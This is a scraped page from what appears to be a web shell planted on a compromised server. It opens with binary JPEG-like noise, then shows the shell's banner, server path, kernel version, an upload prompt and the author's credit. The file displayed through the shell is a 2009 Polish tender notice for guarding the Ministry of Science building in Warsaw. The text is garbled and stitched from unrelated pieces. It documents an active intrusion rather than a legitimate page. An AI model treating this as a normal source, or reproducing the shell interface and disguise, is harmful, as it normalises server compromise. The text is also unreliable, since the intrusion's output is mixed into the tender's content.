JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/37001-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usług całodobowej ochrony budynku, terenu wokół budynku i parkingu należących do posesji Ministerstwa Nauki i Szkolnictwa Wyższego</b><br>
<b>Numer ogłoszenia: 37001 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nauka.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług całodobowej ochrony budynku, terenu wokół budynku i parkingu należących do posesji Ministerstwa Nauki i Szkolnictwa Wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług całodobowej ochrony budynku, terenu wokół budynku i parkingu należących do posesji Ministerstwa Nauki i Szkolnictwa Wyższego.
2. Budynek, o którym mowa w ust. 1 znajduje się przy ul. Wspólnej 1/3 w Warszawie (wejście główne od ul. Hożej), na parterze znajdują się dwie portiernie: od ulicy Hożej portiernia główna, od ulicy Wspólnej portiernia tylko dla pracowników, budynek jest podpiwniczony, siedmiokondygnacyjny, wolnostojący, o przekroju w kształcie litery u, o powierzchni 
10 846 m2. 
3. Parking, o którym mowa w ust. 1, przylegający do budynku, jest ogrodzony, na 38 stanowisk, do którego wjazd i wyjazd zamykany jest dwustronnie uchylnymi szlabanami (z możliwością zdalnego otwierania przez stałych użytkowników), obok którego znajduje się pomieszczenie strażnicze.
4. Przedmiot zamówienia obejmuje:
1) Pełnienie całodobowej ochrony obiektu MNiSW przy ulicy Wspólnej 1/3 w Warszawie, polegającej w szczególności na:
a) zapewnieniu ochrony osób przebywających w budynku i granicach ochranianego obszaru i mienia znajdującego się w budynku i na terenie parkingu,
b) nadzorze nad ruchem pracowników, gości i interesantów na terenie ministerstwa oraz prowadzenie ewidencji w tym zakresie,
c) niedopuszczeniu do przebywania na terenie budynku i na parkingu osób nieuprawnionych,
d) przeciwdziałaniu kradzieżom, napadom i innym zakłóceniom spokoju i porządku,
e) dokonywaniu obchodów wewnętrznych i zewnętrznych chronionego obiektu, ze szczególnym zwróceniem uwagi na bezpieczeństwo ogólne i przeciwpożarowe,
f) kontrolowaniu legalności wynoszenia z i wnoszenia do budynku sprzętów, urządzeń, przedmiotów,
g) nadzorze i obsłudze stanowiska monitoringu,
h) nadzorze nad ruchem pojazdów na parkingu oraz prowadzenie ewidencji w tym zakresie, a także niedopuszczeniu do wjazdu na teren parkingu nieuprawnionych samochodów,
i) alarmowaniu i ostrzeganiu osób przebywających na terenie obiektu w przypadku wystąpienia lub otrzymania informacji o zagrożeniu bezpieczeństwa,
j) podejmowaniu interwencji zmierzającej do udaremnienia naruszenia systemu ochrony oraz zapobiegnięcia lub ograniczenia skutków zagrożenia dla bezpieczeństwa osób i ochrony mienia przez osoby pełniące służbę i patrol interwencyjny,
k) pełnieniu służby na dwóch portierniach i parkingu - 3 posterunki,
l) przeprowadzaniu systematycznych obchodów siedmiu kondygnacji budynku, 
ze szczególnym sprawdzeniem zabezpieczenia wybranych pomieszczeń (np. kancelaria tajna, kasa, serwerownia, pomieszczenia kadr);
m) współudział przedstawiciela Wykonawcy w opracowywaniu i aktualizacji planu ochrony obiektu.
2) Konwojowanie osób i przesyłek - do 3 razy w miesiącu, w zależności od potrzeb Zamawiającego. 
5. Wykonawca zapewni:
1) stałych pracowników ochrony (tj. pełniących służbę tylko w MNiSW) w ilości niezbędnej do wykonania usługi przez 5 pracowników zatrudnionych na dziennej zmianie (w godz. 7oo - 19oo) oraz 4 pracowników zatrudnionych na nocnej zmianie (w godz. 19oo - 7oo), z zastrzeżeniem, że na każdej zmianie pełnił będzie służbę jako kierownik zmiany 
co najmniej 1 pracownik posiadających licencję pracownika ochrony fizycznej;
2) całodobowe monitorowanie w swojej siedzibie sygnałów alarmowych pochodzących z chronionego obiektu;
3) środki łączności zapewniające niezakłóconą łączność w czasie wykonywania usługi pomiędzy posterunkami, patrolem interwencyjnym i centrum monitorowania Wykonawcy również podczas realizacji obchodów i patroli;
4) środki przymusu bezpośredniego, w które zostaną wyposażeni pracownicy ochrony umożliwiające prawidłowe i skuteczne wykonanie usługi ochrony obiektu;
5) co najmniej dwie osoby z licencjami pracownika ochrony fizycznej, pełniącymi służbę w samochodzie patrolowym na terenie Warszawy (grupa interwencyjna), tak, aby mogła podjąć interwencję w budynku ministerstwa nie dłuższym niż 10 minut od odebrania sygnału o zagrożeniu ze Stacji Monitorowania Alarmów - uruchomienia systemu alarmowego włamania.
6. Przed objęciem ochroną obiektu Wykonawca zobowiązany będzie do protokolarnego przejęcia obiektu od firmy dotychczas świadczącej usługi ochrony oraz sprawdzenia znajdujących się urządzeń i zabezpieczeń oraz złożenia oświadczenia dotyczącego przejęcia obiektu i sprawdzenia urządzeń i zabezpieczeń, a także czy wnosi zastrzeżenia w tym zakresie.
7. Wykonawca zobowiązany będzie do przekazania ochranianego obiektu wykonawcy wyłonionemu w kolejnym postępowaniu, w terminie i na zasadach uzgodnionych w trybie roboczym z Zamawiającym, w sposób umożliwiający zapewnienie ciągłości świadczenia usług ochrony.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o niniejsze zamówienie zobowiązany jest do wniesienia wadium (przed upływem terminu składania ofert) w wysokości: 6 000,00 zł (słownie złotych: sześć tysięcy)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1 - 4 ustawy Pzp, tj.: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; Uwaga - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w pkt 1 - 3 musi spełniać przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.
4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp. Uwaga  - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu z postępowania.
2. Warunki szczegółowe:
1) W celu wykazania spełniania warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt 1 Wykonawca musi posiadać aktualną koncesję udzieloną przez Ministra Spraw Wewnętrznych i Administracji na działalność gospodarczą w zakresie ochrony osób i mienia;
2) W celu wykazania spełniania warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt 2 Wykonawca musi wykazać, że:
a) posiada doświadczenie do wykonania zamówienia. Za posiadanie doświadczenia Zamawiający uzna wykazanie przez Wykonawcę, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. W przedmiotowym postępowaniu Wykonawca musi wykazać, że wykonał należycie co najmniej trzy usługi (ochrony osób i mienia), każda o wartości brutto co najmniej 440 000,00 zł  z podaniem ich wartości przedmiotu, dat wykonania oraz odbiorców;
b) posiada techniczną możliwość całodobowego monitorowania i odbierania w swojej siedzibie sygnałów alarmowych pochodzących z chronionego obiektu również za pośrednictwem technicznych środków łączności;
c) dysponuje odrębnymi, niezależnymi środkami łączności umożliwiającymi łączność pomiędzy pracownikiem ochrony i centralą firmy lub Policji, w które będą wyposażeni pracownicy przewidziani do realizacji zamówienia;
d) dysponuje środkami przymusu bezpośredniego zgodnie z przepisami ustawy o ochronie osób i mienia (Dz.U. z 1997 r. Nr 114, poz.740 z późn. zm.);
e) dysponuje odpowiednią ilością pracowników ochrony spełniających warunki określone w niniejszej SIWZ niezbędną do wykonania zamówienia;
f) dysponuje odpowiednią ilością pracowników ochrony posiadających licencję pracownika ochrony fizycznej, którzy będą pełnić służbę w samochodzie patrolowym na terenie Warszawy (grupa interwencyjna), tak, aby mogła podjąć interwencję w ochranianym obiekcie  nie dłuższym niż 10 minut od wysłania sygnału o zagrożeniu z ochranianego obiektu;
3) Wykonawca do realizacji przedmiotu zamówienia przeznaczy osoby, które nie figurują w Krajowym Rejestrze Karnym oraz spełniają wymóg, o którym mowa w art. 26 ust. 3 pkt 2 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145 poz. 1221 z późn. zm.) oraz spełniają warunki określone w Specyfikacji Istotnych Warunków Zamówienia;
4) W celu wykazania spełniania warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt 3 Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 4.000.000,00 zł (słownie złotych: cztery miliony).
3. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego w SIWZ). Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 1 - 3 ustawy Pzp (wzór stanowi Załącznik Nr 1 do SIWZ).
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (wzór stanowi Załącznik Nr 2 do SIWZ).
3. Aktualna koncesja udzielona przez Ministra Spraw Wewnętrznych i Administracji na działalność gospodarczą w zakresie ochrony osób i mienia.
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług (ochrony osób i mienia) oraz dokumenty potwierdzające należyte wykonanie tych usług np. protokoły odbioru, referencje. (wzór stanowi załącznik nr 4 do SIWZ).
8. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności (wzór stanowi załącznik nr 5 do SIWZ). Uwaga - Zmiana osoby wymienionej w wykazie osób w toku realizacji umowy będzie dopuszczalna pod warunkiem pisemnej zgody  Zamawiającego. Zaproponowana osoba musi spełniać co najmniej wymagania określone w niniejszej SIWZ.
9. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ust. 8, Wykonawca wykazał osoby, którymi będzie dysponował.
10. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj.: licencja pracownika ochrony fizycznej. 
11. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca (wzór stanowi załącznik nr 6 do SIWZ). 
12. Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ust. 11, Wykonawca wykazał narzędzia i urządzenia, którymi będzie dysponował.
13. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, o wartości nie mniejszej niż 4.000.000 zł.
14. Inne np.: pełnomocnictwo dla osoby podpisującej ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynika z przepisów prawa lub innych dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.nauka.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr 36).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 11:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr 36).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja na temat wizji: 
1) przed wyznaczonym terminem do składania ofert w niniejszym postępowaniu zostanie zorganizowana wizja obiektu w celu umożliwienia uzyskania wszelkich informacji dla kompleksowego sporządzenia oferty. 
2) zamawiający informuje, że dla należytego przygotowania oferty, udział w wizji jest wskazany. Termin wizji ustala się na dzień 16.02.2009 r. r. o godz. 12:00,

Creat By MiNi SheLL
Email: jattceo@gmail.com